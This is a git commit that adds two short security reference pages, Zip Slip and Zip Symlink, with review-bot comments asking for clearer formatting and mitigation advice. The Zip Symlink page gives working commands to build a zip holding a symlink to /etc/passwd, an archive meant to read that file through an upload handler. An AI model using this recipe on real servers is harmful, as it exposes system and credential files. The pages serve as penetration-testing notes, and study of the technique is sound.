gurkenhabicht 2023-08-28 19:45:37 +02:00
parent 3834c1617e
commit ef401ad5ed
2 changed files with 19 additions and 0 deletions


@ -0,0 +1,3 @@
# Zip Slip
* [snyk's ZipSlip repository](https://github.com/snyk/zip-slip-vulnerability)
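Review bot: The new Zip Slip page consists only of the `# Zip Slip` heading and one external link, so it documents nothing on its own. Add a sentence or two under the heading saying what the issue is (archive entry names such as `../` paths that resolve outside the extraction directory) and what an extractor should verify (the resolved destination stays inside the target directory), so the page stays useful if the linked repository moves.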


@ -0,0 +1,16 @@
# Zip Symlink
https://effortlesssecurity.in/zip-symlink-vulnerability/
The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file.
Create a symlink and put it in a zip file.
```sh
ln -s /etc/passwd link.name
```
compress it leaving symlinks intact
```sh
zip -r --symlinks mal.zip link.name
```
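Review bot: The heading, the bare URL and the first sentence of the Zip Symlink page sit on consecutive lines with no blank line between them, so Markdown will fold the URL and "The exploit is a method of ..." into a single paragraph. Format the reference as a list item the way the Zip Slip page does (`* [title](url)`), separate it from the prose with blank lines, expand "LFI" on first use, and capitalise "compress it leaving symlinks intact". The page also ends at building `mal.zip` without saying when this matters or how to prevent it; a closing line stating that the upload handler must extract the archive and follow the link for the file read to happen, and that extraction code should reject or skip symlink entries, would make the note complete.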